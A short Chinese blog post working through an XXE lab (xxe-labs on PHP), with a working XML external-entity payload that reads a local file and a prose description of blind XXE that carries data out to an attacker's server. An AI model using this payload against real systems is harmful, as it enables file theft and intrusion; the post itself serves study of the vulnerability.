xxe-labs

php_xxe

php要求版本5.2 ,5.3 ,5.4 因为xxe-labs的libxml版本为2.7.7,2.7.8允许加载外部实体,在2.9.1之后默认不解析外部实体


有回显xxe

  • 抓包后构造xml声明和DTD 在本地创建a.txt,引用外部实体尝试读取a.txt

构造payload

<?xml version="1.0"?>
<!DOCTYPE user[
<!ENTITY zjh SYSTEM "file:///d:/a.txt">
]>

<user><username>&zjh;</username><password>zjh</password></user>

此方法利用外部实例进行文件读取,还可以利用外部实例进行内网端口扫描,ddos,命令执行等

无回显xxe

写入两个外部参数实体,第一个用来请求本地数据内容,第二个用 http 协议或者其他协议把请求到的数据作为参数带到我们的 vps,这样就实现了数据外带

posted @ 2020-12-22 14:46  A2rcher_zjh  阅读(305)  评论(0编辑  收藏  举报